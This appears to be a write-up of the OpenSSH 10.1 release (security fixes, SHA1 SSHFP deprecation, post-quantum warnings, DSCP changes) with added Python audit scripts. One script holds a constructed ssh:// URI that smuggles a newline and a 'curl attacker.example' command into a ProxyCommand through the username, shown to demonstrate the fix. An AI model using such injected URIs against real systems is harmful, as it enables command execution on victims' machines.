The OpenSSH team has just announced the release of OpenSSH 10.1. This update brings a mix of security hardening, protocol deprecations, and some potentially disruptive changes to defaults — the kind of release where sysadmins and developers should read the changelog closely before rolling it out everywhere.
Security and Deprecations
- Control character injection fix: `ssh(1)` now rejects usernames containing control characters or `\0` in `ssh://` URIs. A crafted URI could previously smuggle such characters into a `ProxyCommand` through `%u` expansion, and the expanded command is run through the user's shell. Reported by David Leadbeater.
- SHA1 SSHFP records are officially on the chopping block. A future release will ignore SHA1-based SSHFP DNS records entirely, and `ssh-keygen -r` will generate only SHA256 records. If you publish SSHFP records and rely on `VerifyHostKeyDNS`, start regenerating them now.
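Two checks prompted by the items above, as an added example (this is not OpenSSH's code). The first part reproduces the injection shape in plain Python: `parse_ssh_uri`, `expand_proxycommand` and `safe_expand_proxycommand` are simplified stand-ins for ssh's URI parsing and `%u` expansion, not the real implementation. The second part derives SSHFP records the way `ssh-keygen -r` does (SHA-256 over the raw public key blob) and flags fingerprint type 1 records. The URI, the `ProxyCommand` template and the Ed25519 key blob are constructed sample data; the key is correctly framed but is not a real key.

```python
"""Two pre-upgrade checks prompted by the OpenSSH 10.1 security items above.

Added example, not OpenSSH code. It models the behaviour in plain Python:
  1. how a crafted ssh:// URI username reaches a ProxyCommand through %u, and
     the control-character check that 10.1 now applies to URI usernames;
  2. how SSHFP records are derived from a host key, so SHA1 (type 1) records
     can be spotted and SHA256 (type 2) replacements generated.
"""
import base64
import hashlib
import struct
from urllib.parse import unquote, urlsplit

# --- 1. ssh:// URI usernames and %u expansion ------------------------------

def parse_ssh_uri(uri: str) -> tuple:
    """Return (user, host, port) from an ssh:// URI, percent-decoding the user."""
    parts = urlsplit(uri)
    if parts.scheme != "ssh" or not parts.hostname:
        raise ValueError(f"not an ssh:// URI: {uri!r}")
    user = unquote(parts.username) if parts.username is not None else None
    return user, parts.hostname, parts.port or 22

def has_control_chars(s: str) -> bool:
    """True if s contains NUL, any other C0 control character, or DEL."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in s)

def expand_proxycommand(template: str, user: str, host: str, port: int) -> str:
    """Stand-in for ssh's %u/%h/%p expansion (hypothetical helper, unchecked).

    ssh runs the expanded string through the user's shell, so a newline in
    the username turns the remainder into a second command.
    """
    return template.replace("%u", user).replace("%h", host).replace("%p", str(port))

def safe_expand_proxycommand(template: str, user: str, host: str, port: int) -> str:
    """Same expansion, but refuse the usernames the 10.1 check rejects."""
    if has_control_chars(user):
        raise ValueError("username contains control characters or NUL")
    return expand_proxycommand(template, user, host, port)

# Constructed sample: %0A decodes to a newline, %20 to a space.
MALICIOUS_URI = "ssh://alice%0Acurl%20attacker.example@bastion.example:2222"
PROXY_TEMPLATE = "ssh -W %h:%p -l %u jump.example"

# --- 2. SSHFP records: SHA1 deprecation and SHA256 generation --------------

# Algorithm numbers from RFC 4255 (RSA, DSA), RFC 6594 (ECDSA), RFC 7479 (Ed25519).
SSHFP_ALG = {"ssh-rsa": 1, "ssh-dss": 2, "ecdsa-sha2-nistp256": 3,
             "ecdsa-sha2-nistp384": 3, "ecdsa-sha2-nistp521": 3, "ssh-ed25519": 4}
SSHFP_SHA1, SSHFP_SHA256 = 1, 2  # fingerprint type field

def sshfp_record(hostname: str, pubkey_line: str, fptype: int = SSHFP_SHA256) -> str:
    """Build one SSHFP RR from a public key line as found in ssh_host_*_key.pub."""
    keytype, b64blob = pubkey_line.split()[:2]
    blob = base64.b64decode(b64blob)  # the fingerprint covers the raw wire blob
    digest = hashlib.sha256(blob) if fptype == SSHFP_SHA256 else hashlib.sha1(blob)
    return f"{hostname} IN SSHFP {SSHFP_ALG[keytype]} {fptype} {digest.hexdigest()}"

def deprecated_sshfp(record: str) -> bool:
    """True if an SSHFP RR uses fingerprint type 1 (SHA1), deprecated in 10.1."""
    fields = record.split()
    return int(fields[fields.index("SSHFP") + 2]) == SSHFP_SHA1

def constructed_ed25519_pubkey_line() -> str:
    """A correctly framed ssh-ed25519 blob around a dummy point: NOT a real key.

    SSHFP hashes the blob as-is, so correct framing is all this example needs.
    """
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(range(32))
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " sample@bastion"

if __name__ == "__main__":
    user, host, port = parse_ssh_uri(MALICIOUS_URI)
    print("unchecked:", repr(expand_proxycommand(PROXY_TEMPLATE, user, host, port)))
    try:
        safe_expand_proxycommand(PROXY_TEMPLATE, user, host, port)
    except ValueError as e:
        print("10.1 behaviour:", e)
    key = constructed_ed25519_pubkey_line()
    for rec in (sshfp_record("bastion.example.", key, SSHFP_SHA1),
                sshfp_record("bastion.example.", key)):
        print("DEPRECATED" if deprecated_sshfp(rec) else "ok        ", rec)
```

Run it and the unchecked expansion prints with a literal `\n` before `curl attacker.example`, which is exactly the second shell command the fix prevents. For the DNS side, feed it your real `ssh_host_*_key.pub` lines and compare the type 2 output with `ssh-keygen -r`; any published record whose third field is `1` is what the coming release will stop honouring.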
Post-Quantum Warning
OpenSSH 10.1 introduces a warning when a connection negotiates a key exchange algorithm that is not post-quantum. The motivation is “store now, decrypt later”: traffic recorded today could be decrypted once a sufficiently large quantum computer exists. The warning is controlled by a new `WarnWeakCrypto` option (default: on). The project has a page on post-quantum readiness with more context.
This is not new post-quantum support. OpenSSH has shipped hybrid post-quantum key exchange for some time (`mlkem768x25519-sha256` has been the default since 10.0); the warning flags connections where the peer does not support it and the exchange falls back to a classical-only algorithm, which is the signal that the other end needs upgrading.
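`WarnWeakCrypto` reports the fallback at connect time; the same information is in `ssh -v` output, which is useful when you already have debug logs from many hosts and want a list of peers to upgrade. The following is an added example, not OpenSSH code: it scans the `kex: algorithm:` debug lines, classifies each connection's negotiated key exchange against OpenSSH's hybrid post-quantum methods, and lists the remote software versions that negotiated a classical-only exchange. The log excerpt is constructed in the format `ssh -v` prints.

```python
"""Find connections that fell back to classical key exchange in `ssh -v` logs.

Added example, not OpenSSH code. WarnWeakCrypto reports this at connect time;
this helper pulls the same information out of saved debug output so peers that
still need upgrading can be listed. The log excerpt below is constructed in
the format ssh -v prints ("debug1: kex: algorithm: <name>").
"""
import re

# Hybrid post-quantum key exchange methods OpenSSH implements.
PQ_KEX = {
    "mlkem768x25519-sha256",            # default since OpenSSH 10.0
    "sntrup761x25519-sha512",
    "sntrup761x25519-sha512@openssh.com",
}

REMOTE_LINE = re.compile(r"remote software version (\S+)")
KEX_LINE = re.compile(r"kex: algorithm: (\S+)")


def kex_is_post_quantum(kex_name: str) -> bool:
    """True for the hybrid PQ methods above; everything else is classical-only."""
    return kex_name in PQ_KEX


def connections(debug_output: str) -> list:
    """Return one (remote_version, kex, is_pq) tuple per connection in the log.

    A connection is recognised by its "remote software version" line followed
    by its "kex: algorithm" line; other debug lines are ignored.
    """
    result, remote = [], "unknown"
    for line in debug_output.splitlines():
        m = REMOTE_LINE.search(line)
        if m:
            remote = m.group(1)
            continue
        m = KEX_LINE.search(line)
        if m:
            result.append((remote, m.group(1), kex_is_post_quantum(m.group(1))))
    return result


def needs_upgrade(debug_output: str) -> list:
    """Remote software versions that negotiated a classical-only kex."""
    return sorted({remote for remote, _, pq in connections(debug_output) if not pq})


# Constructed sample: two connections, one to a 10.1 peer and one to an old one.
SAMPLE_LOG = """\
debug1: Local version string SSH-2.0-OpenSSH_10.1
debug1: Remote protocol version 2.0, remote software version OpenSSH_10.1
debug1: kex: algorithm: mlkem768x25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: Local version string SSH-2.0-OpenSSH_10.1
debug1: Remote protocol version 2.0, remote software version OpenSSH_8.2p1
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
"""

if __name__ == "__main__":
    for remote, kex, pq in connections(SAMPLE_LOG):
        print(f"{remote:16} {kex:36} {'post-quantum' if pq else 'CLASSICAL'}")
    print("peers to upgrade:", needs_upgrade(SAMPLE_LOG))
```

The classical fallback here is `curve25519-sha256`, which is still perfectly sound against today's adversaries; the point of the warning, and of this listing, is that sessions to such peers are the ones worth recording for a future decryption attempt.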
DSCP / IPQoS Overhaul
One of the bigger behavioral changes: OpenSSH has revised its DSCP (DiffServ) defaults for traffic prioritization.
- Interactive sessions (e.g. shells) now use Expedited Forwarding (EF) by default.
- Non-interactive traffic (e.g. `sftp` transfers) falls back to the system default DSCP marking.
- OpenSSH now switches DSCP values dynamically depending on which kinds of channels are active in the connection.
Additionally, the old IPv4 ToS keywords (`lowdelay`, `throughput`, `reliability`) are deprecated and ignored. If you have legacy `IPQoS` configurations that still use them, they will not fail to load; they silently fall back to the system default, so check your configs rather than assuming the old marking is still applied.
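A quick way to find those legacy settings before rolling out, as an added example that is not OpenSSH code: the script below knows the keyword set `ssh_config(5)` accepts for `IPQoS`, resolves each to the TOS byte ssh writes (DSCP code point shifted left by two, or the raw value for the old ToS keywords and numeric settings), and reports every directive that relies on a deprecated keyword. The config excerpts are constructed; the `resolve_ipqos_keyword` and `audit_ipqos` names are this example's own.

```python
"""Audit IPQoS settings for the OpenSSH 10.1 DSCP changes.

Added example, not OpenSSH code. Resolves each IPQoS token to the TOS byte
ssh would set and flags the IPv4 ToS keywords that 10.1 deprecates and ignores.
The config excerpts at the bottom are constructed samples.
"""
import re

# DSCP code points (RFC 2474, 2597, 3246, 8622), as accepted by ssh_config(5).
DSCP = {f"cs{n}": n << 3 for n in range(8)}
DSCP.update({f"af{c}{d}": (c << 3) | (d << 1) for c in (1, 2, 3, 4) for d in (1, 2, 3)})
DSCP.update({"ef": 46, "le": 1})

# Legacy IPv4 ToS keywords: raw TOS byte values, deprecated and ignored in 10.1.
LEGACY_TOS = {"lowdelay": 0x10, "throughput": 0x08, "reliability": 0x04}


def resolve_ipqos_keyword(word: str) -> tuple:
    """Return (tos_byte_or_None, kind) for one IPQoS token.

    kind is "dscp", "legacy-tos", "numeric" or "system-default".
    """
    w = word.lower()
    if w in DSCP:
        return DSCP[w] << 2, "dscp"        # DSCP occupies the top 6 bits of TOS
    if w in LEGACY_TOS:
        return LEGACY_TOS[w], "legacy-tos"
    if w == "none":
        return None, "system-default"
    try:
        n = int(w, 0)                       # ssh_config also takes a raw TOS byte
    except ValueError:
        raise ValueError(f"unknown IPQoS value {word!r}") from None
    if not 0 <= n <= 255:
        raise ValueError(f"IPQoS value out of range: {word!r}")
    return n, "numeric"


# "IPQoS <interactive> [<bulk>]"; a single value applies to both classes.
IPQOS_LINE = re.compile(r"^\s*IPQoS\s+(\S+)(?:\s+(\S+))?\s*$", re.IGNORECASE | re.MULTILINE)


def audit_ipqos(config_text: str) -> list:
    """One finding per IPQoS directive: which tokens apply and which are deprecated."""
    findings = []
    for m in IPQOS_LINE.finditer(config_text):
        interactive, bulk = m.group(1), m.group(2) or m.group(1)
        deprecated = sorted({w for w in (interactive, bulk)
                             if resolve_ipqos_keyword(w)[1] == "legacy-tos"})
        findings.append({"interactive": interactive, "bulk": bulk,
                         "deprecated": deprecated})
    return findings


# Constructed sshd_config excerpts.
LEGACY_CONFIG = """\
Port 22
IPQoS lowdelay throughput
"""
MODERN_CONFIG = """\
Port 22
IPQoS ef none
"""

if __name__ == "__main__":
    for name, cfg in (("legacy", LEGACY_CONFIG), ("modern", MODERN_CONFIG)):
        for f in audit_ipqos(cfg):
            print(name, f)
```

`IPQoS ef none` is the explicit spelling of what 10.1 now does on its own: EF for interactive channels, operating-system default for bulk transfers. The pre-10.1 default was `af21 cs1`, so a config that pins those values keeps working but no longer matches what an unconfigured 10.1 does.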
Other Notable Changes
- ssh-agent socket paths moved from `/tmp` to `~/.ssh/agent`, reducing exposure to other processes that can access `/tmp`. The agent now has cleanup logic for stale sockets.
- XMSS keys removed (an experimental post-quantum signature scheme that was never enabled by default). A new PQC signature scheme is expected in the future.
- ssh-add now auto-removes certificates shortly after they expire, with a grace period.
- The unit test framework gained benchmarking support (`make unit-bench`).
Bugfix Highlights
- Fixed some subtle race conditions in `sshd(8)` around process exits and MaxStartups.
- `sshd` configs can now grow to 4MB (up from 256KB).
- sftp now correctly surfaces failed writes even if a later one succeeded.
- Several memory leaks squashed (found via LeakSanitizer, Coverity, and manual review).
OpenSSH remains one of the most widely deployed pieces of security-critical software on the internet. The 10.1 release is not just about fixing bugs — it reflects the project’s long-standing philosophy of tightening security defaults and nudging operators toward better practices:
- Phasing out SHA1 entirely.
- Preparing the ecosystem for a post-quantum world.
- Modernizing QoS handling for real-world networks.
As always, the release tarballs, signatures, and checksums are up; note that the SHA256 checksums are base64-encoded, not hex.
If you’re running OpenSSH in production, this is one of those “test before wide rollout” releases, especially if you rely on legacy `IPQoS` configs, SHA1 SSHFP records, or scripts that assume agent sockets live in `/tmp`.